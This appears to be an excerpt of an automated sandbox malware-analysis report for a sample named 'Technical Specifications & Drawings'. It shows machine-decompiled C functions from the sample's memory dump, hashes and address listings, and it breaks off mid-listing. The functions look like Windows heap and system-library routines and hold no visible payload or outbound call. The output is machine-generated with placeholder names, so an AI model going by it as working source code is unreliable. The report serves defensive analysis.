                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab99c5fd5f55f19c900d5880ff50c6753359cf402c2f53ea6681c00bb1de9ef6
                                                  • Instruction ID: 79fc222fac01a222b2bc3d4d9bc54294a296369026492035d25e05391dcc020f
                                                  • Opcode Fuzzy Hash: ab99c5fd5f55f19c900d5880ff50c6753359cf402c2f53ea6681c00bb1de9ef6
                                                  • Instruction Fuzzy Hash: 6341B732A0021D9BDB31DF68C944BEAB7F8AF45700F0105A9E949EB245EB74DE40CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D4D3B Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E017D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x189d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E017EFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1897bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E017EB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L017C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E017ACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E017EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E017EF380(_t67 + 0xc, 0x1785138, 0x10) == 0) {
								 *0x18960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E017D4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E017D4E70(0x18986b0, 0x17d5690, 0, 0) != 0) {
					_t46 = E017ACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                  0x017d4d3b
                                                  0x017d4d4d
                                                  0x017d4d53
                                                  0x017d4d58
                                                  0x017d4d65
                                                  0x017d4d6c
                                                  0x017d4d71
                                                  0x017d4d77
                                                  0x017d4d7f
                                                  0x017d4d8c
                                                  0x017d4d8e
                                                  0x017d4dad
                                                  0x017d4db0
                                                  0x017d4db7
                                                  0x017d4db8
                                                  0x017d4db9
                                                  0x017d4dba
                                                  0x017d4dbb
                                                  0x017d4dc1
                                                  0x017d4dc8
                                                  0x017d4dcc
                                                  0x017d4dd5
                                                  0x017d4dde
                                                  0x017d4ddf
                                                  0x017d4de0
                                                  0x017d4de1
                                                  0x017d4de6
                                                  0x017d4de7
                                                  0x017d4de9
                                                  0x017d4df3
                                                  0x00000000
                                                  0x00000000
                                                  0x01816c7c
                                                  0x01816c8a
                                                  0x01816c8a
                                                  0x01816c9d
                                                  0x01816ca7
                                                  0x01816cac
                                                  0x01816cb2
                                                  0x01816cb9
                                                  0x00000000
                                                  0x01816cbf
                                                  0x01816cbf
                                                  0x00000000
                                                  0x01816cbf
                                                  0x01816cb9
                                                  0x017d4dfb
                                                  0x01816ccf
                                                  0x01816cd3
                                                  0x017d4e32
                                                  0x017d4e39
                                                  0x01816ce0
                                                  0x01816cf2
                                                  0x01816cf2
                                                  0x01816ce0
                                                  0x017d4e3f
                                                  0x017d4e41
                                                  0x017d4e51
                                                  0x017d4e51
                                                  0x017d4e03
                                                  0x017d4e03
                                                  0x017d4e09
                                                  0x017d4e0f
                                                  0x017d4e57
                                                  0x00000000
                                                  0x00000000
                                                  0x017d4e1b
                                                  0x017d4e30
                                                  0x017d4e5b
                                                  0x017d4e5b
                                                  0x00000000
                                                  0x017d4e30
                                                  0x017d4e11
                                                  0x017d4e11
                                                  0x017d4e16
                                                  0x00000000
                                                  0x017d4e16
                                                  0x017d4e01
                                                  0x00000000
                                                  0x017d4e01
                                                  0x017d4da5
                                                  0x01816c6b
                                                  0x00000000
                                                  0x017d4dab
                                                  0x017d4dab
                                                  0x00000000
                                                  0x017d4dab

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bbb1dccc8dccf15fe52bb802067a29e46116077479b0e214ed8d67bf052f2a1
                                                  • Instruction ID: 6d77df1758a51e6acc7b8050c3db747fe60c8e4777dbdfdac7fe54c54b78ea4a
                                                  • Opcode Fuzzy Hash: 0bbb1dccc8dccf15fe52bb802067a29e46116077479b0e214ed8d67bf052f2a1
                                                  • Instruction Fuzzy Hash: 6641B271A44318AFEB32DF18CC88F66F7B9EB59710F040099E9469B685D7B4DE40CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B8A0A Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E017B8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x189d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E017EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E017BE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1781180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E017D1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E017E3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E017B8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                  0x017b8a0a
                                                  0x017b8a1c
                                                  0x017b8a23
                                                  0x017b8a2e
                                                  0x017b8a30
                                                  0x017b8a36
                                                  0x017b8a3c
                                                  0x017b8a3e
                                                  0x017b8a4a
                                                  0x017b8a52
                                                  0x017b8a9c
                                                  0x017b8aae
                                                  0x017b8a58
                                                  0x017b8a5e
                                                  0x017b8a6a
                                                  0x017b8a6f
                                                  0x017b8a75
                                                  0x017b8a7d
                                                  0x017b8a85
                                                  0x017b8a86
                                                  0x017b8a89
                                                  0x017b8a93
                                                  0x017b8a99
                                                  0x017b8a9b
                                                  0x00000000
                                                  0x017b8aaf
                                                  0x017b8abe
                                                  0x017b8ac3
                                                  0x017b8acb
                                                  0x017b8ad7
                                                  0x017b8ae0
                                                  0x017b8af1
                                                  0x00000000
                                                  0x017b8af1
                                                  0x017b8acd
                                                  0x017b8ad5
                                                  0x017b8afb
                                                  0x017b8afd
                                                  0x017b8aff
                                                  0x017b8b07
                                                  0x017b8b22
                                                  0x017b8b24
                                                  0x017b8b2a
                                                  0x017b8b2e
                                                  0x017b8b3f
                                                  0x017b8b78
                                                  0x017b8b41
                                                  0x017b8b52
                                                  0x017b8b54
                                                  0x017b8b5c
                                                  0x017b8b74
                                                  0x017b8b74
                                                  0x017b8b5c
                                                  0x017b8b3f
                                                  0x017b8b5e
                                                  0x017b8b61
                                                  0x017b8b64
                                                  0x017b8b64
                                                  0x017b8b6c
                                                  0x017b8b6c
                                                  0x017b8b11
                                                  0x01809cd5
                                                  0x01809cd5
                                                  0x017b8b17
                                                  0x017b8b1a
                                                  0x017b8b1a
                                                  0x00000000
                                                  0x017b8ad5
                                                  0x017b8a89

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a49da39d4d9609d2732b583a3d1bc0d135076e99f0f2d95aaf5af1d627324210
                                                  • Instruction ID: 3ef5678d9e39b705003ddb03a013938845e11a39f47e2ade6814bc4d1c1fbbcc
                                                  • Opcode Fuzzy Hash: a49da39d4d9609d2732b583a3d1bc0d135076e99f0f2d95aaf5af1d627324210
                                                  • Instruction Fuzzy Hash: 85413DB4A402299BDB24DF69C8C8BEAF7B8EB54300F1045E9D91997252E7709E80CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0186AA16 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0186AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0186ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0186AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0186AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0184CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L017C77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E017C7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0186131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0184CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                  0x0186aa1f
                                                  0x0186aa21
                                                  0x0186aa23
                                                  0x0186aa2b
                                                  0x0186aa30
                                                  0x0186aa36
                                                  0x0186aa39
                                                  0x0186aa42
                                                  0x0186aa75
                                                  0x0186aa7a
                                                  0x0186aa7c
                                                  0x0186aa7c
                                                  0x0186aa88
                                                  0x0186aa8a
                                                  0x0186aa8f
                                                  0x0186ab02
                                                  0x0186ab04
                                                  0x0186aa99
                                                  0x0186aaa8
                                                  0x0186aaaf
                                                  0x0186aab3
                                                  0x0186aacc
                                                  0x0186aad1
                                                  0x0186aad6
                                                  0x0186aae0
                                                  0x0186aaf3
                                                  0x0186aaf9
                                                  0x0186aafe
                                                  0x0186aafe
                                                  0x0186aaf3
                                                  0x0186aad6
                                                  0x0186aab3
                                                  0x0186ab07
                                                  0x0186ab0a
                                                  0x0186ab11
                                                  0x0186ab23
                                                  0x0186ab13
                                                  0x0186ab1c
                                                  0x0186ab1c
                                                  0x0186ab2b
                                                  0x0186ab44
                                                  0x0186ab44
                                                  0x0186ab51
                                                  0x0186ab51
                                                  0x0186aa44
                                                  0x0186aa47
                                                  0x0186aa4c
                                                  0x00000000
                                                  0x00000000
                                                  0x0186aa5a
                                                  0x0186aa64
                                                  0x0186aa72
                                                  0x00000000
                                                  0x0186aa66
                                                  0x0186aa66
                                                  0x0186aa68
                                                  0x0186aa6a
                                                  0x00000000
                                                  0x0186aa6a

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction ID: 689efa371e2d28c155d3b02386da7865567d3a1a7cc448d630a07358d231ce4a
                                                  • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                  • Instruction Fuzzy Hash: ED31D132B002096BEB198B69CC85BBFFBAEEF84710F058469E905F7291DA74DE40C650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0186FDE2 Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E0186FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0186FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01870A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E017C7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01861608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01872B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0186C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0186DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E017C7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0186A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                  0x0186fde7
                                                  0x0186fde8
                                                  0x0186fdec
                                                  0x0186fdee
                                                  0x0186fdf5
                                                  0x0186fdf7
                                                  0x0186fdfc
                                                  0x0186fe19
                                                  0x0186fe22
                                                  0x0186fe26
                                                  0x0186fec6
                                                  0x0186fecd
                                                  0x0186fed5
                                                  0x0186fee7
                                                  0x0186fed7
                                                  0x0186fee0
                                                  0x0186fee0
                                                  0x0186feef
                                                  0x0186ff00
                                                  0x0186ff02
                                                  0x0186ff07
                                                  0x0186ff07
                                                  0x00000000
                                                  0x0186feef
                                                  0x0186fe33
                                                  0x0186fe55
                                                  0x0186fe59
                                                  0x0186fe5b
                                                  0x0186fe5e
                                                  0x0186fe69
                                                  0x0186fe6d
                                                  0x0186fe6d
                                                  0x0186fe69
                                                  0x0186fe35
                                                  0x0186fe41
                                                  0x0186fe41
                                                  0x0186fe79
                                                  0x0186fe8b
                                                  0x0186fe7b
                                                  0x0186fe84
                                                  0x0186fe84
                                                  0x0186fe93
                                                  0x00000000
                                                  0x0186fea8
                                                  0x0186feba
                                                  0x00000000
                                                  0x0186feba
                                                  0x0186fdfe
                                                  0x0186fe01
                                                  0x0186fe02
                                                  0x0186fe08
                                                  0x0186ff0c
                                                  0x0186ff14
                                                  0x0186ff14

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction ID: 491f8ca89d8625c3a69ead6fabd03fcb21ce52fb1f8c4320ca375395cc196a97
                                                  • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                  • Instruction Fuzzy Hash: 1031E132300645AFD3269B6CDC64F6ABFAEEF85B50F184158EA46CB342DA74DE41C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0186EA55 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E0186EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E017C2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0186E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E017AF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E017BFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0186AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0186BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E017C7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0185FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E017BFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0186A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                  0x0186ea55
                                                  0x0186ea66
                                                  0x0186ea68
                                                  0x0186ea6c
                                                  0x0186ea6f
                                                  0x0186ea72
                                                  0x0186ea75
                                                  0x0186ea7a
                                                  0x0186ea7a
                                                  0x0186ea7e
                                                  0x0186ea80
                                                  0x0186ea85
                                                  0x0186ea8b
                                                  0x0186eab5
                                                  0x0186eabc
                                                  0x0186eabf
                                                  0x0186eabf
                                                  0x0186eaca
                                                  0x0186eace
                                                  0x0186ead0
                                                  0x0186eae4
                                                  0x0186eaeb
                                                  0x0186eaf0
                                                  0x0186eaf5
                                                  0x0186eb09
                                                  0x0186eb0d
                                                  0x0186eb1d
                                                  0x0186eb2d
                                                  0x0186eb38
                                                  0x0186eb3d
                                                  0x0186eb41
                                                  0x0186eb4a
                                                  0x0186eb60
                                                  0x0186eb4c
                                                  0x0186eb52
                                                  0x0186eb59
                                                  0x0186eb59
                                                  0x0186eb68
                                                  0x0186eb71
                                                  0x0186eb71
                                                  0x0186ea8d
                                                  0x0186ea8f
                                                  0x0186ea92
                                                  0x0186ea97
                                                  0x0186ea97
                                                  0x0186ea9b
                                                  0x0186ea9c
                                                  0x0186ea9e
                                                  0x0186eaa6
                                                  0x0186eaa6
                                                  0x0186eb7e

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction ID: e30907b248821e1fed00a5ec221977d2322a4843da8917ea5e21966d5517fc42
                                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                  • Instruction Fuzzy Hash: DF31A1766047069BC719DF28C884A6BB7AEFBD0710F04492DF556C7645EE30E905CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018269A6 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E018269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x189d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L017B6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01826BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E017E9980() >= 0) {
							E017C2280(_t56, 0x1898778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1898774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1898774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E017AB6F0(0x178c338, 0x178c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E017E9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E017E95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E017BFFB0(_t68, _t77, 0x1898778);
				}
				_pop(_t78);
				return E017EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                  0x018269b5
                                                  0x018269be
                                                  0x018269c3
                                                  0x018269c9
                                                  0x018269cc
                                                  0x018269d1
                                                  0x018269d3
                                                  0x018269de
                                                  0x018269e1
                                                  0x018269ea
                                                  0x018269f6
                                                  0x018269fe
                                                  0x01826a13
                                                  0x01826a14
                                                  0x01826a15
                                                  0x01826a16
                                                  0x01826a1e
                                                  0x01826a26
                                                  0x01826a31
                                                  0x01826a36
                                                  0x01826a37
                                                  0x01826a40
                                                  0x01826a49
                                                  0x01826a4a
                                                  0x01826a53
                                                  0x01826a59
                                                  0x01826a5d
                                                  0x01826a5e
                                                  0x01826a64
                                                  0x01826a67
                                                  0x01826a6a
                                                  0x01826a6d
                                                  0x01826a70
                                                  0x01826a77
                                                  0x01826a7d
                                                  0x01826a86
                                                  0x01826a89
                                                  0x01826a9c
                                                  0x01826a9f
                                                  0x01826aa2
                                                  0x01826aa5
                                                  0x01826aaf
                                                  0x01826ab1
                                                  0x01826ab8
